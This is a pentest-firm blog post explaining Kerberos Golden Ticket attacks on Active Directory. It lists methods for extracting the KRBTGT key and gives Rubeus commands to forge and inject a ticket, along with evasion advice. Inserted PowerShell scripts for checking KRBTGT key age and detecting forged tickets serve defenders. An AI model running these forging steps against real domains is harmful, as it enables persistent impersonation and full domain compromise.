Tickets Kerberos

Celia Catalán


Today we are going to talk about one of the techniques we usually carry out during internal pentests.

Once an attacker manages to compromise a domain after achieving high privileges, such as Domain Admin or Enterprise Admin, it is very difficult for an organization to regain full control of the forest and consider it 100% clean.

Attackers with this access can use their high privileges to extract special credentials from the domain and use them to gain persistence, being able to regain access as any user at any time. These credentials are rarely or never modified, giving attackers virtually unlimited access.

Over a series of posts we are going to look at some of these persistence techniques, all of which are based on the use of Kerberos tickets.

GOLDEN TICKET

A Golden Ticket attack involves forging a valid Ticket Granting Ticket (TGT) that impersonates any user, using the NTLM hash (or AES key) of the Active Directory KRBTGT account. The technique is particularly powerful because it grants access to any service or machine in the domain as the impersonated user. It is essential to remember that the credentials of the KRBTGT account are never updated automatically.

To acquire the NTLM hash of the KRBTGT account, several methods can be used:

  • It can be extracted from memory by dumping the LSASS (Local Security Authority Subsystem Service) process of a Domain Controller.
  • It can also be extracted from the NT Directory Services database (NTDS.dit) stored on any Domain Controller.
  • Or it can be obtained with a DCSync attack, which can be carried out with tools such as Mimikatz or Impacket's secretsdump.py script.

It is important to mention that these operations normally require Domain Admin privileges or an equivalent level of access (auth/system). For this reason, Golden Tickets are used for lateral movement across the rest of the domain and to establish persistence, not for privilege escalation.

As with the Silver Ticket, although the NTLM hash is a viable option for this purpose, it is recommended to carry out the attack with the Kerberos AES (Advanced Encryption Standard) keys instead, for operational security reasons and to be less detectable: a ticket encrypted with RC4 stands out in a domain whose accounts use AES.

Impact

A Golden Ticket allows unlimited and persistent access to any resource within the domain until the KRBTGT key is changed, which can be a complex and disruptive process.
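The only way to invalidate a Golden Ticket is to change the KRBTGT key, so the first thing a defender wants to know is how old that key is. The following PowerShell snippet is an added example, not code from the original post; it assumes the ActiveDirectory RSAT module is available on a domain-joined host, and the 180-day rotation threshold is an assumption to adjust to your own policy. It goes slightly beyond the post by also covering the krbtgt_<id> accounts that read-only Domain Controllers use.

```powershell
# Added example (not from the original post): report the age of every KRBTGT key in the
# domain (the main krbtgt account plus one krbtgt_<id> account per read-only DC) and flag
# keys older than an assumed 180-day rotation policy. Requires the ActiveDirectory module.
Import-Module ActiveDirectory

$maxKeyAgeDays = 180   # assumed rotation policy; adjust to your own

Get-ADUser -Filter "SamAccountName -like 'krbtgt*'" -Properties PasswordLastSet |
    ForEach-Object {
        # Age of the current key, derived from the last password change of the account
        $ageDays = ((Get-Date) - $_.PasswordLastSet).TotalDays
        [pscustomobject]@{
            Account         = $_.SamAccountName
            PasswordLastSet = $_.PasswordLastSet
            KeyAgeDays      = [int]$ageDays
            RotationOverdue = $ageDays -gt $maxKeyAgeDays
        }
    } | Format-Table -AutoSize
```

When a rotation is overdue (or a compromise is suspected), the KRBTGT password has to be reset twice, because the KDC keeps the previous key and keeps accepting tickets encrypted with it. Leave at least the maximum TGT lifetime (10 hours by default) plus AD replication time between the two resets: resetting twice in quick succession also invalidates every legitimate ticket in the domain, which is the disruption the paragraph above refers to.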

Exploitation

For this scenario, we start from a compromised domain, where we have Domain Admin credentials and we have managed to perform the DCSync technique, thus obtaining the Kerberos keys of the KRBTGT account.

Ticket creation

To create the Golden Ticket, we can use the Rubeus tool and execute the following command:

Rubeus.exe golden /aes256:42a38fe97bcf9c48190e5d77e48faa7d95b7fed838c8910845a86d66d78f188a /user:Eddard.stark /domain:north.sevenkingdoms.local /sid:S-1-5-21-1430251130-2586379517-4083755373 /nowrap


  • /aes256: AES-256 key of the KRBTGT account extracted earlier
  • /user: User to impersonate, in this case a Domain Admin
  • /domain: Domain name
  • /sid: SID of the domain

Import the ticket

Once the ticket has been generated, but before importing it, we can check that we still have no SMB access to the Domain Controller:

ls \\winterfell\c$



To gain access, we first have to import the ticket into our session. We can use Rubeus again for this:

Rubeus.exe createnetonly /program:C:\Windows\System32\cmd.exe /domain:NORTH /username:Eddard.stark /password:PassFake /ticket:doIGDDCCBgigAwI[…]tcy5sb2NhbA==



  • /program: Program to launch; the ticket is injected into that process
  • /domain: Domain name
  • /username: Domain user
  • /password: User password. The user's real password does not need to be known
  • /ticket: The ticket created in the previous step

Once the ticket has been imported, we can access the DC:

ls \\winterfell\c$



Below we summarise the key aspects to bear in mind when considering the possibility of a Golden Ticket.

Feature                   Golden Ticket
Aim                       Access to the entire domain
Required credentials      Domain Administrator or KRBTGT
Impact                    Unlimited domain access
Attack complexity         High
Key countermeasures       KRBTGT protection, comprehensive monitoring
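"Comprehensive monitoring" in practice means looking at the Kerberos service-ticket requests (Event ID 4769) that a forged TGT generates on the Domain Controllers. The following PowerShell script is an added example, not part of the original post or of the Rubeus project; it assumes it runs on a Domain Controller with the ActiveDirectory module available, and the 24-hour lookback window is an assumption. It checks two classic indicators: service tickets encrypted with RC4 (TicketEncryptionType 0x17) in a domain that uses AES, which is exactly why the post recommends forging with AES keys, and tickets issued to an account name that does not exist in AD, which can only come from a forged TGT.

```powershell
# Added example (not from the original post): hunt the DC Security log for Kerberos TGS
# requests (Event ID 4769) that carry common forged-ticket indicators. Assumes it runs on a
# Domain Controller with the ActiveDirectory module; the lookback window is an assumption.
Import-Module ActiveDirectory

$lookback = (Get-Date).AddHours(-24)   # assumed hunting window

# Build the set of principals that really exist (users and computer accounts); a service
# ticket for any other name means the TGT behind it was not issued by the KDC for a real account
$knownAccounts = @{}
Get-ADUser     -Filter * | ForEach-Object { $knownAccounts[$_.SamAccountName.ToLower()] = $true }
Get-ADComputer -Filter * | ForEach-Object { $knownAccounts[$_.SamAccountName.ToLower()] = $true }

$events = Get-WinEvent -FilterHashtable @{ LogName = 'Security'; Id = 4769; StartTime = $lookback } `
                       -ErrorAction SilentlyContinue

foreach ($event in $events) {
    # Flatten the EventData <Data Name="..."> elements into a hashtable
    $xml  = [xml]$event.ToXml()
    $data = @{}
    foreach ($d in $xml.Event.EventData.Data) { $data[$d.Name] = $d.'#text' }

    # TargetUserName is logged as user@REALM; keep only the account part
    $user = ($data['TargetUserName'] -split '@')[0]
    if (-not $user) { continue }

    $reasons = @()

    # RC4 (0x17) service tickets in an AES-enabled domain are the footprint of a ticket forged
    # from an NTLM hash (legitimate AES clients request 0x12 / 0x11)
    if ($data['TicketEncryptionType'] -eq '0x17') { $reasons += 'RC4 ticket encryption' }

    # A service ticket for an account that does not exist in AD cannot come from a real TGT
    if (-not $knownAccounts.ContainsKey($user.ToLower())) { $reasons += 'account not in AD' }

    if ($reasons.Count -gt 0) {
        [pscustomobject]@{
            Time       = $event.TimeCreated
            User       = $data['TargetUserName']
            Service    = $data['ServiceName']
            ClientIP   = $data['IpAddress']
            Encryption = $data['TicketEncryptionType']
            Reason     = $reasons -join '; '
        }
    }
}
```

Neither indicator is conclusive on its own: RC4 tickets also appear with Kerberoasting and with legacy systems that have not been moved to AES, and the "account not in AD" check says nothing about a ticket forged for an existing Domain Admin, as in the scenario above. Treat hits as leads to correlate with the source host and the KRBTGT key age, and keep the KRBTGT rotation as the control that actually closes the door.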


And that is all about tickets (not exactly the fair kind); see you in the next installment.

Álvaro Temes, Cybersecurity Analyst at Zerolynx.